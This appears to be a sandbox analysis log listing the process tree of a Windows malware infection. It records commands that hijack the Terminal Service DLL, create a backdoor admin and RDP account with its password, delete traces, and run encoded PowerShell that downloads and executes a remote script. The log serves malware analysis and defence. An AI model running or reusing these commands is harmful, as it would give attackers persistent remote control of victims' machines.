C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2568
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:960
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3408
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:3236
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1912
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:3180
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:1476
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:3584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2432
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:4068
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:2124
-
C:\Windows\system32\net.exenet start TermService5⤵PID:4024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3556
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2060
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\CC4F.exeC:\Users\Admin\AppData\Local\Temp\CC4F.exe1⤵
- Executes dropped EXE
PID:1852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 9802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\D2B9.exeC:\Users\Admin\AppData\Local\Temp\D2B9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
C:\Users\Admin\AppData\Local\Temp\DE05.exeC:\Users\Admin\AppData\Local\Temp\DE05.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ffsqzohs\ffsqzohs.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16F4.tmp" "c:\Users\Admin\AppData\Local\Temp\ffsqzohs\CSCE7A0BCCA9C5043FFAC857F79D8DD5F0.TMP"4⤵PID:3604
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:3548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:788
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:1912
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2876
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2700
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:2836
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:1872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3872
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1132
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:3880
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:2664
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2580
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3848
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1844
-
-
-
C:\Users\Admin\AppData\Local\Temp\E44F.exeC:\Users\Admin\AppData\Local\Temp\E44F.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\E44F.exeC:\Users\Admin\AppData\Local\Temp\E44F.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:2664
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:2544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 9IT1wUoS /add1⤵PID:2168
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 9IT1wUoS /add2⤵PID:3180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 9IT1wUoS /add3⤵PID:3872
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:4060
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3176
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵PID:1512
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵PID:3592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:680
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:4072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:804
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 9IT1wUoS1⤵PID:3180
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 9IT1wUoS2⤵PID:3584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 9IT1wUoS3⤵PID:3560
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2716
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:1980
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2576
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:2976
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1564
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2124
-
-
-
C:\Users\Admin\AppData\Roaming\cbtfvtuC:\Users\Admin\AppData\Roaming\cbtfvtu1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2968 -
C:\Users\Admin\AppData\Roaming\cbtfvtuC:\Users\Admin\AppData\Roaming\cbtfvtu2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3808
-